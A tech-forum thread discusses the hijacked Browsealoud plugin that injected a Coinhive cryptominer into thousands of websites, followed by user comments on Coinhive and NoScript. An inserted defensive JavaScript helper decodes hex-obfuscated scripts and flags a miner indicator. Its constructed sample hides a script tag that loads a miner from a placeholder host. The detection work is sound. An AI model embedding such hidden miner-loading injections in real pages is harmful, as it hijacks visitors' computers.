
More than 4,200 websites affected by a hijacked website plugin

ProjectBox153

If you've been to one of the 4,275 websites listed here, you may have been a victim of a hijacked plugin using visitors' CPUs to mine Monero. The affected plugin, named Browsealoud, is used to read websites out to people who may have issues using the web. The code for the plugin was altered to inject Coinhive's Monero miner into the website, and as a result people have been mining Monero for someone who, as far as I'm aware, is still anonymous.

Quote

The injected mining code was obfuscated, but when converted from hexadecimal back to ASCII it spelled out the necessary magic to summon Coinhive's stealthy JavaScript miner to the page.

This plugin was used by a lot of UK government websites. Luckily, the company seemed to be on top of the incident, and released a Twitter post addressing the problem:

Quote

"We are addressing this immediately," the biz said via Twitter. "Our Browsealoud service has been temporarily disabled whilst our engineering team investigates."

Texthelp, the company that develops Browsealoud, has said that "no customer data has been accessed or lost", and customers will receive an update once it becomes available.

 

Sources:

 

Main System: Phobos

AMD Ryzen 7 2700 (8C/16T), ASRock B450 Steel Legend, 16GB G.SKILL Aegis DDR4 3000MHz, AMD Radeon RX 570 4GB (XFX), 960GB Crucial M500, 2TB Seagate BarraCuda, Windows 10 Pro for Workstations/macOS Catalina

 

Secondary System: York

Intel Core i7-2600 (4C/8T), ASUS P8Z68-V/GEN3, 16GB GEIL Enhance Corsa DDR3 1600MHz, Zotac GeForce GTX 550 Ti 1GB, 240GB ADATA Ultimate SU650, Windows 10 Pro for Workstations

 

Older File Server: Yet to be named

Intel Pentium 4 HT (1C/2T), Intel D865GBF, 3GB DDR 400MHz, ATI Radeon HD 4650 1GB (HIS), 80GB WD Caviar, 320GB Hitachi Deskstar, Windows XP Pro SP3, Windows Server 2003 R2
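
The hex-to-ASCII step quoted in the opening post, as an added example that is not part of the original thread or of the reporting it quotes: a JavaScript triage helper that decodes hex-encoded strings in a third-party script and flags indicators that only become visible after decoding. The sample scripts, the `coinhive.example` host and all function names are constructed for illustration.

```javascript
// Added example: triage helper for a third-party script that may have been tampered with.
// Indicator from the thread: the decoded code loaded Coinhive's miner.
const INDICATORS = ["coinhive"];

// Turn a run of hex pairs into text, but only when every byte is printable ASCII.
function decodeBareHex(run) {
  const bytes = run.match(/../g).map((h) => parseInt(h, 16));
  const printable = bytes.every((b) => b >= 0x20 && b <= 0x7e);
  return printable ? String.fromCharCode(...bytes) : run;
}

// Undo the common hex layers: \xNN escapes, \uNNNN escapes, long bare hex runs.
function decodeHexLayers(source) {
  const toChar = (_, h) => String.fromCharCode(parseInt(h, 16));
  return source
    .replace(/\\x([0-9a-fA-F]{2})/g, toChar)
    .replace(/\\u([0-9a-fA-F]{4})/g, toChar)
    .replace(/\b(?:[0-9a-fA-F]{2}){8,}\b/g, decodeBareHex);
}

// Report each indicator and whether it was visible before decoding.
function scanScript(source) {
  const decoded = decodeHexLayers(source);
  const findings = INDICATORS
    .filter((ind) => decoded.toLowerCase().includes(ind))
    .map((ind) => ({ indicator: ind, hidden: !source.toLowerCase().includes(ind) }));
  return { decoded, findings };
}

// Constructed sample, not the real payload; coinhive.example is a placeholder host.
const toHexEscapes = (s) =>
  [...s].map((c) => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const CLEAR = "<script src='https://coinhive.example/miner.js'></script>";
const SAMPLE_TAMPERED = 'speak();document["write"]("' + toHexEscapes(CLEAR) + '");';
const SAMPLE_CLEAN = 'speak();console.log("deadbeef");';

for (const [name, src] of [["tampered", SAMPLE_TAMPERED], ["clean", SAMPLE_CLEAN]]) {
  console.log(name, JSON.stringify(scanScript(src).findings));
}
```

A finding with `hidden: true` means the indicator exists only after decoding, which is the pattern the quoted report describes.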


Well, the other post seems to have been updated. Damn, I wish I hadn’t already been working on this. 


Is it just me or would 95% of these problems with mining on websites be fixed if Coinhive got their act together and started taking action against people who are clearly just using their service maliciously to make a quick buck?

 

Anyway, good to see at least one company involved is being proactive and investigating...


2 minutes ago, inventor02 said:

Is it just me or would 95% of these problems with mining on websites be fixed if Coinhive got their act together and started taking action against people who are clearly just using their service maliciously to make a quick buck?

 

Anyway, good to see at least one company involved is being proactive and investigating...

Coinhive takes a 30-60% cut, so making their income smaller isn't in their best interest.


I'm for internet privacy, but would things like this happen if obscurity was not so easy? There is no way to catch the people/person who did this (is there???), so there is no punishment for the crime. What would even happen to someone if they were caught? What could they be charged with?

 


2 hours ago, Almostbauws said:

Coinhive takes a 30-60% cut, so making their income smaller isn't in their best interest.

Yes, but providing a vehicle for illicit behavior is also a crime. That's how they approach torrent hosting sites. The service won't last if they continue to profit from that type of behavior.


Just now, Tiberiusisgame said:

The service won't last if they continue to profit from that type of behavior.

Well, I don't know about that...


2 hours ago, Jamiec1130 said:

This plugin was used by a lot of UK government websites.

So it won't affect users in the US unless we connect to those sites?

Quote or tag me( @Crunchy Dragon) if you want me to see your reply

If a post solved your problem/answered your question, please consider marking it as "solved"

Community Standards // Join Floatplane!


1 minute ago, Almostbauws said:

Well, I don't know about that...

You know what... that's fair. The Bay still exists.


1 minute ago, Crunchy Dragon said:

So it won't affect users in the US unless we connect to those sites?

You'll have to check the link to see which exact sites were affected.


One of the first sites I saw on the list was the Swedish police's official site. Gg wp! 

 

edit: Seems like a ton of Swedish government sites and various "official" Swedish sites were hit.


I remember when the internet was basically html and a browser that did little more than recreate a page from it. I remember when I first saw scripts like php and I didn't understand them properly (and still don't largely) but I remember being concerned at the ability to run remote programs and control/start code on your computer.

 

As every year rolls on I see that fear was not unfounded with more and more attacks and exploits taking advantage of more complex systems and scripts. 

 

My fervor for a really broken down browser that can do nothing but interpret html and maybe render a basic data set for things like train timetables and price lists is growing.

Grammar and spelling is not indicative of intelligence/knowledge.  Not having the same opinion does not always mean lack of understanding.  


 

24 minutes ago, mr moose said:

I remember when the internet was basically html and a browser that did little more than recreate a page from it. I remember when I first saw scripts like php and I didn't understand them properly (and still don't largely) but I remember being concerned at the ability to run remote programs and control/start code on your computer.

 

As every year rolls on I see that fear was not unfounded with more and more attacks and exploits taking advantage of more complex systems and scripts. 

 

My fervor for a really broken down browser that can do nothing but interpret html and maybe render a basic data set for things like train timetables and price lists is growing.

Stallman warned us. And now here we are today.

One day I will be able to play Monster Hunter Frontier in French/Italian/English on my PC, it's just a matter of time... 4 5 6 7 8 9 years later: It's finally coming!!!

Phones: iPhone 4S/SE | LG V10 | Lumia 920 | Samsung S24 Ultra

Laptops: Macbook Pro 15" (mid-2012) | Compaq Presario V6000

Other: Steam Deck

<>EVs are bad, they kill the planet and remove freedoms too some/<>


NoScript FTW...

23 hours ago, mr moose said:

I remember when the internet was basically html and a browser that did little more than recreate a page from it. I remember when I first saw scripts like php and I didn't understand them properly (and still don't largely) but I remember being concerned at the ability to run remote programs and control/start code on your computer.

 

As every year rolls on I see that fear was not unfounded with more and more attacks and exploits taking advantage of more complex systems and scripts. 

 

My fervor for a really broken down browser that can do nothing but interpret html and maybe render a basic data set for things like train timetables and price lists is growing.

Use NoScript....


1 minute ago, jagdtigger said:

NoScript FTW...

Use NoScript....

I used to, I used to have several plugins like that and greasemonkey. The problem is every few months things change. Websites alter the way they run, FF updates or the plugins simply cease to be maintained or become a liability themselves. Plus I use car part websites that don't work properly now due to the security settings on my browser. So whenever I need to place an order I have to disable half of them anyway.

The whole affair is frustrating, the internet used to be fun, it used to be the easier place to get things done, but now when you combine the sheer number of accounts one must have with the complexity of security measures and the need to be on top of all of them it is just getting to be a joke.

 

